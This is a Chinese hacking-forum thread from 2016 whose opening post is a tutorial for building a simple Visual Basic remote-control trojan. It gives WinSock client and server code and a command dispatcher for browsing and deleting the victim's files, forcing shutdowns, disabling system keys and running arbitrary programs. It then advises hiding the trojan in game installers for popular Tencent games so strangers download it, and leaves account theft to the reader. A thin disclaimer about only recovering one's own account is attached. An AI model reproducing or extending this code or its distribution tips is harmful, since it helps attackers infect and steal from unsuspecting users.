中国第八军团
新手报道 :
新兵宿舍
求助问答 :
悬赏问答
技术探讨 :
网络安全
敲敲代码 :
编程开发
资源分享 :
资源下载
论坛生活 :
军团茶座
站务管理 :
论坛版务
主题:1690 回帖:16933 会员:1264 在线:1
发新帖

想学会编程才能编写木马程序吗?

程小诺 2016-7-7 4024
你需要学会编程才能编写木马,编写木马最好用vc++,这是c++的教程,你学懂了这些皮毛的东西再深入研究内核编程吧c+如果上面的地址打不开可以到本站!咳咳,我们有些朋友的游戏账号经常被盗,有一些甚至来找本站要我帮忙盗回来,但本人已经退出网络打仗的生活,已经不会再去盗号,不过大家不用担心,我花了一个下午编写的文章,将如何教大家一个简单的特洛伊木马,切忌:我教大家只是希望大家能用来道回自己的号.千万不要用于非法用途,否则出事了,后果自负!



先使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。
在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) > 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State < > sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是,在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub
这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口;

Case 5

屏蔽开始菜单;

Case 6

按照客户机端传过来的文件名或目录名,而删除它;

Case 7

屏蔽热启动键;

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。
客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。
另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序,至于怎么发出去,这个很简单,只要把他压缩成一个压缩文件.再放入压缩箱里,发过去给别人就行了.如果不会发.你可以复制在游戏安装器上.然后再发到网上.等那个倒霉的人下载到了你的游戏安装器.那他就惨了.(建议复制在DNF和CF等腾讯游戏上.因为腾讯游戏是比较多人玩的!) ,至于怎么控制别人和盗别人的号.就靠你自己琢磨了!



在这里继续提醒大家,木马是个两面刀,如果你做好了发不出或者乱搞,到时候你自己的电脑就会处于瘫痪状态!
最新回复 (7)
sleefe 2016-8-6
1
谢谢
程小诺 2016-8-8
2
。。。。。。沙发。。。。。好吧,我就抢个板凳吧回复 2# sleefe
SterbenGun 2016-10-24
3
回复 3# 程小诺


水到现在也是6
程小诺 2016-10-25
4
回复 4# SterbenGun


所以不给你水了啊
Dcwr 2017-1-11
5
一个字就是水。
帅到没朋友的 Dcwr 友情水
程小诺 2017-1-11
6
回复 6# Dcwr


厉害了
幽灬梦羽 2月前
7
程小诺 。。。。。。沙发。。。。。好吧,我就抢个板凳吧[em_25][em_25][em_25]回复 2# sleefe
怎么所有的帖子,都能看见你的沙发
返回



©1999-2017 第八军团
Time: 0.020, SQL: 12